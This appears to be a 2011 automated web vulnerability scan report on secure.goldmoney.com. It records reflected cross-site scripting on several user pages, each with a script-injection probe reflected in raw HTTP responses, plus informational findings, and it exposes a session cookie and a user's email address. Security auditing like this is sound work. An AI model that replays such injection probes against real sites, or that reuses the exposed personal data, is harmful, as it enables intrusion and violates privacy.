1. Cross-site scripting (reflected)
1.1. https://secure.goldmoney.com/user/login.php [name of an arbitrarily supplied request parameter]
2. Cross-domain Referer leakage
3. Cross-domain script include
3.1. https://secure.goldmoney.com/user/login.php
3.2. https://secure.goldmoney.com/user/opnhld.php
3.3. https://secure.goldmoney.com/user/opnhld2.php
3.4. https://secure.goldmoney.com/user/opnhld4.php
3.5. https://secure.goldmoney.com/user/opnhld5.php
6. Content type incorrectly stated
Severity: | High |
Confidence: | Certain |
Host: | https://secure.goldmoney |
Path: | /user/login.php |
GET /user/login.php/e8b0c"><script>alert(1)< Host: secure.goldmoney.com Connection: keep-alive Referer: http://www.goldmoney.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: gmsid=ql3nfnrh0vf8t1 |
HTTP/1.1 200 OK Date: Thu, 26 May 2011 05:42:16 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 7962 Connection: close Content-Type: text/html; charset=UTF-8 <html> <head> <title>GoldMoney</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="/gm_styles-user.css <link href="/k_butto ...[SNIP]... <a href="/user/login.php/e8b0c"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.goldmoney |
Path: | /user/opnhld.php |
GET /user/opnhld.php/28ed7"><script>alert(1)< Host: secure.goldmoney.com Connection: keep-alive Referer: http://www.goldmoney.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: gmsid=ql3nfnrh0vf8t1 |
HTTP/1.1 200 OK Date: Thu, 26 May 2011 05:42:43 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 16619 <html> <head> <title>GoldMoney</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="/gm_styles-user.css <link href="/k_butto ...[SNIP]... <a href="/user/opnhld.php/28ed7"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.goldmoney |
Path: | /user/opnhld2.php |
GET /user/opnhld2.php/976eb"><script>alert(1)< Host: secure.goldmoney.com Connection: keep-alive Referer: https://secure.goldmoney Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: gmsid=ql3nfnrh0vf8t1 |
HTTP/1.1 200 OK Date: Thu, 26 May 2011 05:43:24 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 7551 Connection: close Content-Type: text/html; charset=UTF-8 <html> <head> <title>GoldMoney</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="/gm_styles-user.css <link href="/k_butto ...[SNIP]... <a href="/user/opnhld2.php/976eb"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.goldmoney |
Path: | /user/opnhld4.php |
GET /user/opnhld4.php/94480"><script>alert(1)< Host: secure.goldmoney.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: gmsid=ql3nfnrh0vf8t1 |
HTTP/1.1 200 OK Date: Thu, 26 May 2011 05:49:12 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 12881 <html> <head> <title>GoldMoney</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="/gm_styles-user.css <link href="/k_butto ...[SNIP]... <a href="/user/opnhld4.php/94480"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.goldmoney |
Path: | /user/opnhld.php |
GET /user/opnhld.php?gmerror Host: secure.goldmoney.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: gmsid=ql3nfnrh0vf8t1 |
HTTP/1.1 200 OK Date: Thu, 26 May 2011 05:47:31 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 16749 <html> <head> <title>GoldMoney</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="/gm_styles-user.css <link href="/k_butto ...[SNIP]... <td colspan="3" align="right"> <script type="text/javascript" src="https://seal ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.goldmoney |
Path: | /user/login.php |
GET /user/login.php HTTP/1.1 Host: secure.goldmoney.com Connection: keep-alive Referer: http://www.goldmoney.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: gmsid=ql3nfnrh0vf8t1 |
HTTP/1.1 200 OK Date: Thu, 26 May 2011 05:42:01 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 7830 Connection: close Content-Type: text/html; charset=UTF-8 <html> <head> <title>GoldMoney</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="/gm_styles-user.css <link href="/k_butto ...[SNIP]... <td align="left"> <script type="text/javascript" src="https://seal ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.goldmoney |
Path: | /user/opnhld.php |
GET /user/opnhld.php HTTP/1.1 Host: secure.goldmoney.com Connection: keep-alive Referer: http://www.goldmoney.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: gmsid=ql3nfnrh0vf8t1 |
HTTP/1.1 200 OK Date: Thu, 26 May 2011 05:42:29 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 16487 <html> <head> <title>GoldMoney</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="/gm_styles-user.css <link href="/k_butto ...[SNIP]... <td colspan="3" align="right"> <script type="text/javascript" src="https://seal ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.goldmoney |
Path: | /user/opnhld2.php |
GET /user/opnhld2.php HTTP/1.1 Host: secure.goldmoney.com Connection: keep-alive Referer: https://secure.goldmoney Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: gmsid=ql3nfnrh0vf8t1 |
HTTP/1.1 200 OK Date: Thu, 26 May 2011 05:43:04 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 7419 Connection: close Content-Type: text/html; charset=UTF-8 <html> <head> <title>GoldMoney</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="/gm_styles-user.css <link href="/k_butto ...[SNIP]... <td colspan="3" align="right"> <script type="text/javascript" src="https://seal ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.goldmoney |
Path: | /user/opnhld4.php |
GET /user/opnhld4.php HTTP/1.1 Host: secure.goldmoney.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: gmsid=ql3nfnrh0vf8t1 |
HTTP/1.1 200 OK Date: Thu, 26 May 2011 05:48:57 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 12749 <html> <head> <title>GoldMoney</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="/gm_styles-user.css <link href="/k_butto ...[SNIP]... <td colspan="3" align="right"> <script type="text/javascript" src="https://seal ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.goldmoney |
Path: | /user/opnhld5.php |
GET /user/opnhld5.php HTTP/1.1 Host: secure.goldmoney.com Connection: keep-alive Referer: https://secure.goldmoney Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: gmsid=ql3nfnrh0vf8t1 |
HTTP/1.1 200 OK Date: Thu, 26 May 2011 05:50:16 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 7934 Connection: close Content-Type: text/html; charset=UTF-8 <html> <head> <title>GoldMoney</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <link href="/gm_styles-user.css <link href="/k_button.css ...[SNIP]... <td colspan="3" align="right"> <script type="text/javascript" src="https://seal ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.goldmoney |
Path: | /user/opnhld2.php |
GET /user/opnhld2.php HTTP/1.1 Host: secure.goldmoney.com Connection: keep-alive Referer: https://secure.goldmoney Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: gmsid=ql3nfnrh0vf8t1 |
HTTP/1.1 200 OK Date: Thu, 26 May 2011 05:43:04 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 7419 Connection: close Content-Type: text/html; charset=UTF-8 <html> <head> <title>GoldMoney</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="/gm_styles-user.css <link href="/k_butto ...[SNIP]... <br> A message was sent to your email address (sa94115@gmail.com). <br> ...[SNIP]... <td class="regular" colspan="2"> Please check your email (sa94115@gmail.com) for a message from GoldMoney (GoldMoney Notification Service <notify@goldmoney.com>). This message contains instructions for validating your email address. </td> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.goldmoney |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: secure.goldmoney.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: gmsid=ql3nfnrh0vf8t1 |
HTTP/1.1 200 OK Date: Thu, 26 May 2011 05:42:17 GMT Server: Apache Last-Modified: Wed, 25 May 2011 14:25:26 GMT ETag: "44e5d5-47e-79c68180" Accept-Ranges: bytes Content-Length: 1150 Connection: close Content-Type: text/plain; charset=UTF-8 ............ .h.......(....... ..... ......................... ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | https://secure.goldmoney |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: secure.goldmoney.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: gmsid=ql3nfnrh0vf8t1 |
HTTP/1.1 200 OK Date: Thu, 26 May 2011 05:42:17 GMT Server: Apache Last-Modified: Wed, 25 May 2011 14:25:26 GMT ETag: "44e5d5-47e-79c68180" Accept-Ranges: bytes Content-Length: 1150 Connection: close Content-Type: text/plain; charset=UTF-8 ............ .h.......(....... ..... ......................... ...[SNIP]... |